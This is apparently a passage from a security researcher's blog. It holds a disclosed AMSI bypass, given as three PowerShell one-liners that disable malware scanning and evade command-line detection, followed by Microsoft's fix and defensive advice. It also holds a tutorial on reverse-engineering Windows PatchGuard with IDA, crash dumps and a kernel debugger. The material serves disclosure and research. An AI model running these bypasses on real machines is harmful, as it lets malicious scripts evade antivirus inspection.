IEX ('[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')

2. Prepend the null character to bypass AMSI based detection.
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')

3. Make any modification sufficient to bypass command line based detection.
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.Amsi'+'Utils").GetField("amsi'+'InitFailed","NonPublic,Static").SetValue($null,$true)')

It is worth noting that this exploitation is usable even in Constrained Language Mode and does not trigger any event logs, unlike most AMSI bypass techniques, which use reflection.

Fix and Recommendation

The fix Microsoft made was to use AmsiScanBuffer instead of AmsiScanString in System.Management.Automation.dll. As shown below, this function accepts an arbitrary byte sequence as contents.
HRESULT WINAPI AmsiScanBuffer(
  _In_     HAMSICONTEXT amsiContext,
  _In_     PVOID        buffer,  // Not terminated at the null character
  _In_     ULONG        length,
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result
);

This way, AMSI providers can receive and scan entire contents even if a null character appears in the middle.

In theory, no action other than applying the patch should be required. However, software vendors using AMSI to scan PowerShell contents should review whether their software handles null characters properly should they appear.

Additionally, security researchers and users of security software can test if their AMSI providers are vulnerable to the bypass technique and ask vendors to address issues if needed. Also, it might be worth monitoring any appearance of a null character in PowerShell contents to detect attempts to exploit this issue.

As for other script engines, PowerShell Core is also affected but does not have a patch as of this writing. Windows Script Host is not affected because its interpreter stops reading script contents at the first null character, unlike PowerShell.


Kudos to Alex Ionescu (@aionescu) for helping me report this issue, and Microsoft for fixing it.

Thursday, October 15, 2015

Some Tips to Analyze PatchGuard

I published a new tool called meow that disables PatchGuard on Windows 8.1 on-the-fly. Though meow has some interesting technical details I could explain, such as support of ARM (Windows RT) and detection of the end of a function for installing an epilogue hook, in this entry I am going to explain some techniques that help researchers analyze PatchGuard on their own rather than how this specific exploitation works.

Those techniques are worth sharing because PatchGuard is a moving target, and you have to be able to analyze it yourself if you hope to do anything with it. meow is not going to work forever as the implementation of PatchGuard is updated, and it may not be perfect even at the time this article is published.


As with regular reverse engineering work, you can analyze PatchGuard both statically and dynamically, but each approach has hurdles specific to PatchGuard, for example:

  • PatchGuard-related functions do not have descriptive names, or have no names at all, unlike other functions in the kernel
  • Most function calls in PatchGuard functions are indirect calls, as in C++ code
  • Kernel debugging is not an option in some situations
  • Code is copied to random locations and stored in an encrypted form, so you cannot easily spot where to monitor at run time

Those are significant difficulties at the initial stage of analysis, but you can easily overcome them if you know the tricks I describe here. The tricks are as follows:

  • Identifying PatchGuard functions
    • Locating an initialization function and checking cross-references
    • Naming functions in a consistent manner
    • Checking the existence of SEH
  • Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard context
    • Dissecting bug check parameters
    • Applying the format of the context to IDA
  • Discovering Threads Executing PatchGuard Code
    • Finding system threads on memory 

Let us go through them one by one.

Identifying PatchGuard functions

Firstly, you can easily find the initialization function of PatchGuard by sorting the function list by length. The largest function in ntoskrnl.exe is the initialization function, which is executed at system initialization and sets up a large structure, the so-called PatchGuard context(s), in non-pageable memory (I am going to describe the structure of the context later). I call this function Pg_xInitializePatchGuard() in this article.
Image 1: The largest functions on x64 
Image 2: The largest functions on ARM
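
In IDA this is simply a matter of sorting the Functions window by its Length column. For readers who work from an exported function list instead, the same idea can be sketched in Python as below. The `Func` tuple and the three entries are placeholders invented for illustration, not values from a real ntoskrnl.exe.

```python
from typing import List, NamedTuple


class Func(NamedTuple):
    name: str
    start: int  # address of the first byte
    end: int    # address just past the last byte


def largest_functions(funcs: List[Func], top: int = 3) -> List[Func]:
    """Return the `top` functions ordered by size, largest first."""
    return sorted(funcs, key=lambda f: f.end - f.start, reverse=True)[:top]


# Placeholder entries, not taken from a real kernel image.
functions = [
    Func("sub_140001000", 0x140001000, 0x140001040),
    Func("sub_140200000", 0x140200000, 0x14020C000),
    Func("sub_140100000", 0x140100000, 0x140100800),
]

for f in largest_functions(functions):
    print(f"{f.name}: {f.end - f.start:#x} bytes")
```

The first line printed is the candidate for the initialization function; whether it really is one still has to be confirmed by reading it.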

Secondly, you can identify other PatchGuard-related functions by following cross-references. If a function is referenced only from other PatchGuard-related functions, it is safe to assume that the function is dedicated to PatchGuard and needs to be analyzed. As an example, let us take a look at a caller of Pg_xInitializePatchGuard(), KiFilterFiberContext(). You see that this function is referenced from Pg_xInitializePatchGuard() and another unnamed function, sub_1407339C3(), which is not called from anywhere. At this stage, it is safe to say that KiFilterFiberContext() and sub_1407339C3() are only used for PatchGuard.
Image 3: Callers of Pg_xInitializePatchGuard()

Image 4: Callers of  sub_1407339C3()
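
The rule of thumb above (a function referenced only from PatchGuard-related functions is itself PatchGuard-related) can be applied repeatedly until no new function is found. The following Python sketch shows that iteration on a tiny hand-written graph. The `callers` mapping and the names sub_A, sub_B, and SomeUnrelatedCaller are hypothetical; in practice the mapping would be exported from the disassembler.

```python
from typing import Dict, Set


def pg_dedicated(callers: Dict[str, Set[str]], seeds: Set[str]) -> Set[str]:
    """Grow `seeds` with every function whose callers are all already in the set.

    `callers` maps a function name to the set of functions that reference it.
    Functions with no recorded callers are never added automatically.
    """
    known = set(seeds)
    changed = True
    while changed:
        changed = False
        for func, refs in callers.items():
            if func not in known and refs and refs <= known:
                known.add(func)
                changed = True
    return known


# Hypothetical cross-reference data for illustration only.
callers = {
    "sub_A": {"Pg_xInitializePatchGuard"},
    "sub_B": {"sub_A", "Pg_xInitializePatchGuard"},
    "ExAllocatePoolWithTag": {"Pg_xInitializePatchGuard", "SomeUnrelatedCaller"},
}

print(sorted(pg_dedicated(callers, {"Pg_xInitializePatchGuard"})))
# ['Pg_xInitializePatchGuard', 'sub_A', 'sub_B']
```

A general-purpose routine such as ExAllocatePoolWithTag is left out because it also has a caller outside the set, which matches the intent of the heuristic.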

For ease of analysis with IDA, it is worth naming functions in a consistent manner since the number of functions to analyze is going to be large. I usually give PatchGuard functions the prefix Pg_ when they have symbol names and Pg_x when they do not. In this case, I name KiFilterFiberContext() as Pg_KiFilterFiberContext(), and sub_1407339C3() as Pg_xKiFilterFiberContextCaller().
Image 5: Filtering functions with the prefix
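
As a small illustration of the convention, the helper below produces the two names used above. `pg_name` is a hypothetical function written for this post, and treating a leading `sub_` as "no symbol" is an assumption based on IDA's default auto-generated names.

```python
from typing import Optional


def pg_name(original: str, description: Optional[str] = None) -> str:
    """Apply the Pg_ / Pg_x naming convention.

    original:    the name the disassembler shows (a symbol or an auto-generated sub_ name)
    description: analyst-chosen name, required for functions without a symbol
    """
    if original.startswith("sub_"):  # assumption: sub_ means no symbol is available
        if not description:
            raise ValueError("a description is needed for functions without symbols")
        return "Pg_x" + description
    return "Pg_" + original


print(pg_name("KiFilterFiberContext"))                         # Pg_KiFilterFiberContext
print(pg_name("sub_1407339C3", "KiFilterFiberContextCaller"))  # Pg_xKiFilterFiberContextCaller
```

Keeping the two prefixes distinct makes it possible to tell at a glance which names came from symbols and which are the analyst's own guesses.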

You may also want to use a script to discover code flow that goes through SEH. With this script, you find that Pg_xKiFilterFiberContextCaller() is an __except expression and that the corresponding __try is in KeInitAmd64SpecificState(). At this point, you may rename Pg_xKiFilterFiberContextCaller() to Pg_xKeInitAmd64SpecificStateExceptionHandler() and KeInitAmd64SpecificState() to Pg_KeInitAmd64SpecificState().
Image 6: Reflected SEH information

Image 7: Where the corresponding __try is

Similarly, you can repeat the same process for all functions and global variables referenced from each Pg_*() function using the Proximity browser of IDA. This gives you a fairly comprehensive list of Pg_ functions, which can be discouraging enough for most casual reverse engineers ;)

Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard Context

As soon as you start to read Pg_*() functions, you discover that there are countless indirect calls through specific registers. Those are accesses to the PatchGuard context, and it is essential to know what is stored there and how it is used to understand the internals of PatchGuard.
Image 8: References to the PatchGuard context
The most precise way to accomplish this is to read the initialization function (i.e., Pg_xInitializePatchGuard()) for function pointers and the main validation routine (i.e., Pg_FsRtlMdlReadCompleteDevEx()) for variables. Besides static analysis, it is also wise to perform dynamic analysis to get the big picture quickly, especially at the initial stage of analysis.

There are some difficulties in performing effective run-time analysis, however.

First of all, you do not know where to monitor at the beginning of analysis since most of the core code is copied to random memory locations and stored in an encoded form except while it is executing. In addition, setting breakpoints or installing hooks in the kernel causes bug check 0x109 unless you know how the integrity check is carried out. Moreover, you may not be able to attach a kernel debugger to systems running on some non-PC devices such as Windows RT and Windows Phone.

This may sound pretty bad, but the good news is that we can still uncover the contents of the PatchGuard context by analyzing a crash dump. Specifically, you can interpret each 'reserved' bug check parameter in the following ways on x64:

  • Arg1 - 0xA3A03F5891C8B4E8 = An address of the PatchGuard context
  • Arg2 - 0xB3B74BDEE4453415 = An address of a validation structure that detected corruption
  • Arg3 = An address of corrupted data (in most cases)

    NB: You can easily spot those magic values in Pg_FsRtlMdlReadCompleteDevEx() before a call to  Pg_SdbpCheckDll() as well as code setting bug check parameters.

Let us take a look at an example on Windows 10. This is what you get on bug check 0x109:
0: kd> !analyze -v
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *


Arg1: a3a01f597768b4f0, Reserved
Arg2: b3b72bdfc9e65cc3, Reserved
Arg3: fffff80100af8074, Failure type dependent information
Arg4: 0000000000000001, Type of corrupted region, can be
Then, check the first parameter:
kd> ? a3a01f597768b4f0 - 0xA3A03F5891C8B4E8
Evaluate expression: -35180519620600 = ffffe000`e5a00008
kd> dps ffffe000`e5a00008 l200
ffffe000`e5a00008  70047266`b0b8a753
ffffe000`e5a000e0  00000000`00000000
ffffe000`e5a000e8  fffff801`00453b80 nt!ExAcquireResourceSharedLite
ffffe000`e5a000f0  fffff801`004537f0 nt!ExAcquireResourceExclusiveLite
ffffe000`e5a000f8  fffff801`00688930 nt!ExAllocatePoolWithTag
ffffe000`e5a00100  fffff801`006896d0 nt!ExFreePool
ffffe000`e5a004b8  fffff801`00b850b0 nt!HandleTableListLock
ffffe000`e5a004c0  ffffc001`0c614000 nt!ObpKernelHandleTable
ffffe000`e5a004c8  fffff780`00000000 nt!KiUserSharedData
ffffe000`e5a004d0  ff73c402`76affdcd ; a copy of nt!KiWaitNever
ffffe000`e5a004d8  fffff801`00b292c0 nt!SeProtectedMapping
In this example, ffffe000`e5a00008 is the address of the PatchGuard context, which starts with random-looking bytes followed by a bunch of function pointers and variables. Although you may not be able to tell what some variables are at a glance, defining the PatchGuard structure in IDA from this result is fundamental to uncovering how PatchGuard works.
Image 9: Defining the structure in IDA

Image 10: Applied the structure definition
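
The subtraction done with `?` in the debugger session above can also be scripted, which is handy when going through many crash dumps. This is a minimal Python sketch; `decode` and `windbg_addr` are helper names made up here, and the two constants are the ones quoted in the list of bug check parameters.

```python
MASK64 = (1 << 64) - 1

# Constants quoted in the list of bug check parameters (x64).
ARG1_KEY = 0xA3A03F5891C8B4E8
ARG2_KEY = 0xB3B74BDEE4453415


def decode(arg: int, key: int) -> int:
    """Subtract the key from a bug check parameter with 64-bit wraparound."""
    return (arg - key) & MASK64


def windbg_addr(value: int) -> str:
    """Format a 64-bit value the way WinDbg prints addresses."""
    return f"{value >> 32:08x}`{value & 0xFFFFFFFF:08x}"


context = decode(0xA3A01F597768B4F0, ARG1_KEY)
print(windbg_addr(context))  # ffffe000`e5a00008
```

The mask matters because Python integers do not wrap: without it the result would be the negative number WinDbg shows on the left-hand side of its output rather than the address.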

The second parameter is the address of the validation structure that detected corruption. There are multiple structures, and each corresponds to a type of corrupted region (Arg4). Their formats vary but mostly consist of at least the type of corrupted region, the address(es) to verify, and the expected checksum(s).

The following is a dump of the structure in this example (I commented with some guesswork):
kd> ? b3b72bdfc9e65cc3 - 0xB3B74BDEE4453415 
Evaluate expression: -35180519544658 = ffffe000`e5a128ae
kd> dps ffffe000`e5a128ae
ffffe000`e5a128ae  00000000`00000001   ; type of corrupted region
ffffe000`e5a128b6  fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)
                                       ; an address of .pdata 
ffffe000`e5a128be  244e1425`0004a9e8   ; checksum?, a virtual size of .pdata
ffffe000`e5a128c6  fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)
                                       ; an address of .pdata 
ffffe000`e5a128ce  fffff801`0041c000 nt!WerLiveKernelInitSystem <PERF> (nt+0x0)
                                       ; an address of nt image base
ffffe000`e5a128d6  0004a9e8`00842000   ; a virtual size of .pdata, a size of nt image
ffffe000`e5a128de  39e90701`406ebd95   ; checksums?
ffffe000`e5a128e6  78ca89f0`62a1f735
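
The guesses in the comments above can be cross-checked with a little arithmetic. The Python sketch below splits the two packed quad-words into 32-bit halves and confirms that the values are consistent with each other. The field meanings remain guesswork, and the variable names are chosen here for illustration.

```python
from typing import Tuple


def split_qword(value: int) -> Tuple[int, int]:
    """Return the (high, low) 32-bit halves of a 64-bit value."""
    return value >> 32, value & 0xFFFFFFFF


# Quad-words copied from the dps output above.
pdata_address = 0xFFFFF80100789000
image_base = 0xFFFFF8010041C000
checksum_and_size = 0x244E14250004A9E8
sizes = 0x0004A9E800842000

checksum_guess, pdata_size = split_qword(checksum_and_size)
pdata_size_again, image_size = split_qword(sizes)

pdata_rva = pdata_address - image_base

print(hex(pdata_rva))                        # 0x36d000
print(pdata_size == pdata_size_again)        # True
print(pdata_rva + pdata_size <= image_size)  # True
```

The offset 0x36d000 matches the `nt+0x36d000` annotation printed by the debugger, and the region described by the address and size fits inside the image, which supports reading these fields as a section address and its size.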

Those structures are stored at the end of the PatchGuard context as a variable-length array, following other structures and the code that repairs corruption so that the bug check can be issued reliably. They are referenced through fields in the context that hold an offset and the number of array entries.

Discovering Threads Executing PatchGuard Code

Another trick for run-time analysis is discovering threads that are running code located in dynamically allocated memory rather than in an image, and setting breakpoints there. It is possible only when you are able to attach a kernel debugger to the system.

As I mentioned earlier, PatchGuard contexts, including their code, are allocated in memory outside any image, either in executable NonPagedPool or in independent pages allocated by MmAllocateIndependentPages(), and this produces unusual output in the thread stack trace.
kd> !process 4 
        THREAD ffffe00137df7040  Cid 0004.0064  Teb: ...
        Win32 Start Address nt!ExpWorkerThread (0xfffff803d16ac3f0)
        Child-SP          RetAddr           Call Site
        ffffd001`043ccdb0 fffff803`d1658ab9 nt!KiSwapContext+0x76
        ffffd001`043ccef0 fffff803`d1657fb8 nt!KiSwapThread+0x689
        ffffd001`043ccfb0 fffff803`d1621d0c nt!KiCommitThreadWait+0x148
        ffffd001`043cd040 ffffe001`37ede587 nt!KeDelayExecutionThread+0x1dc
        ffffd001`043cd0b0 4c91448e`dcd4c0fd 0xffffe001`37ede587
        ffffd001`043cd0b8 00000000`00000000 0x4c91448e`dcd4c0fd
From this output, you can see that thread 0x64 is calling KeDelayExecutionThread() from somewhere outside any image. Obviously, this is not common unless you have malware on your system, especially considering that the thread is a worker thread and not even a dedicated thread.
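
The check itself is simple: a return address that belongs to no loaded image is suspicious. Here is a minimal Python sketch of it using the RetAddr column of the stack trace above. The image range given for nt is an assumption made for this example; the real base and size would come from the debugger's `lm` output.

```python
from typing import List, Tuple


def outside_images(return_addresses: List[int],
                   images: List[Tuple[int, int]]) -> List[int]:
    """Return the addresses that fall in none of the (base, size) image ranges."""
    return [
        addr for addr in return_addresses
        if not any(base <= addr < base + size for base, size in images)
    ]


# Non-zero values from the RetAddr column of the stack trace above.
ret_addrs = [
    0xFFFFF803D1658AB9,
    0xFFFFF803D1657FB8,
    0xFFFFF803D1621D0C,
    0xFFFFE00137EDE587,
    0x4C91448EDCD4C0FD,
]

# Assumed range for nt, for illustration only.
images = [(0xFFFFF803D1600000, 0x800000)]

for addr in outside_images(ret_addrs, images):
    print(f"{addr:#018x}")
# 0xffffe00137ede587
# 0x4c91448edcd4c0fd
```

The second hit is not a canonical x64 address and is most likely noise from walking a stack through code without unwind information, so the first one is the address worth looking at.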

Once you find a thread like this, you are free to set a breakpoint at the return address and take control with the debugger.
kd> u 0xffffe001`37ede587
ffffe001`37ede587 jmp     ffffe001`37ede5b5
ffffe001`37ede589 lea     rax,[rbp+1A8h]
ffffe001`37ede590 xor     r9d,r9d
ffffe001`37ede593 xor     r8d,r8d
ffffe001`37ede596 mov     qword ptr [rsp+20h],rax
ffffe001`37ede59b mov     rcx,r13
ffffe001`37ede59e call    qword ptr [rbp+68h]
ffffe001`37ede5a1 test    eax,eax
kd> bp 0xffffe001`37ede587
Image 11: Woohoo! Enjoy debugging.
This trick does not always work. PatchGuard sometimes skips the sleep functions (KeDelayExecutionThread() or KeWaitForSingleObject()), so you may not catch the moment when a thread is executing code outside images, and sometimes it runs inside ntoskrnl.exe rather than from pool. Still, it is worth rebooting a few times and checking whether such threads exist.

Note that if you want to read code around the return address with IDA, you can search the byte sequence at the return address with [Alt-B].
kd> db 0xffffe001`37ede587 l10
ffffe001`37ede587  eb 2c 48 8d 85 a8 01 00-00 45 33 c9 45 33 c0 48  .,H......E3.E3.H

Image 12: Finding where the PatchGuard context is running in IDA 
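
Turning the `db` output into a search pattern by hand is error-prone, so it can be scripted. The Python sketch below parses the line shown above into raw bytes, prints them as a space-separated hex string (the form IDA's binary search dialog generally accepts), and resolves the short jump at the start as a sanity check against the disassembly. `parse_db_line` and `short_jmp_target` are hypothetical helpers, and the parser assumes a full 16-byte `db` line.

```python
from typing import Tuple


def parse_db_line(line: str) -> Tuple[int, bytes]:
    """Split one full 16-byte line of WinDbg `db` output into (address, bytes)."""
    fields = line.split()
    address = int(fields[0].replace("`", ""), 16)
    # db prints a '-' between the 8th and 9th byte, so 16 bytes arrive as 15 fields.
    hex_part = " ".join(fields[1:16]).replace("-", " ")
    return address, bytes.fromhex(hex_part)


def short_jmp_target(address: int, code: bytes) -> int:
    """Resolve the target of a 2-byte `jmp rel8` (opcode 0xEB) located at `address`."""
    if code[0] != 0xEB:
        raise ValueError("not a short jmp")
    rel8 = int.from_bytes(code[1:2], "little", signed=True)
    return address + 2 + rel8


line = "ffffe001`37ede587  eb 2c 48 8d 85 a8 01 00-00 45 33 c9 45 33 c0 48  .,H......E3.E3.H"
address, code = parse_db_line(line)

print(code.hex(" ").upper())                 # EB 2C 48 8D 85 A8 01 00 00 45 33 C9 45 33 C0 48
print(hex(short_jmp_target(address, code)))  # 0xffffe00137ede5b5
```

The computed target matches the `jmp ffffe001`37ede5b5` line in the `u` output, which confirms the bytes were copied correctly before searching for them.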

Another option is using a hypervisor to monitor and detect PatchGuard threads based on execution of some uncommon instructions if the system is running on the Intel platform. See my PoC Sushi as an example.


We have seen how to locate functions, how to read bug check 0x109 parameters, and how to discover threads running PatchGuard code. That is pretty much everything you need to know to get started. You are now ready to analyze PatchGuard on Windows 10, where no one has succeeded in exploitation yet (at the time I wrote this article). All you have to do is read code, name fields and functions, and test whether your analysis is correct. That would not be anything special to us.

Special Thanks

Thank you very much, @Myriachan, for providing me with many details about Windows RT and an opportunity to work on this fun project.